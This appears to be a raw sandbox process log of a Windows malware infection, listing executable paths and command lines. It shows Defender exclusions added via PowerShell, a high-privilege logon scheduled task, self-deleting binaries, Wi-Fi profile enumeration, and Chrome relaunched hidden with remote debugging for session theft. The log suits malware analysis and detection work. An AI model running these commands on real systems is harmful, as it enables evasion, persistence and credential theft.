"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\Files\XClient.exe
"C:\Users\Admin\Desktop\Files\XClient.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{73f494c0-76ee-4a8d-b7ea-7c4a71dcaf44}
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\Client-built.exe
"C:\Users\Admin\Desktop\Files\Client-built.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\system32\runtime.exe
"C:\Windows\system32\runtime.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SysWOW64\cmd.exe
cmd /c md 704579
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\findstr.exe
findstr /V "MARTNMSPIDERRINGTONE" Mh
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\v7wa24td.exe
"C:\Users\Admin\Desktop\Files\v7wa24td.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\test19.exe
"C:\Users\Admin\Desktop\Files\test19.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\chcp.com
chcp 65001
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 324
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2388 /prefetch:3
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4472,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4504 /prefetch:1
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pif
Organizational.pif u
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5096,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5080 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
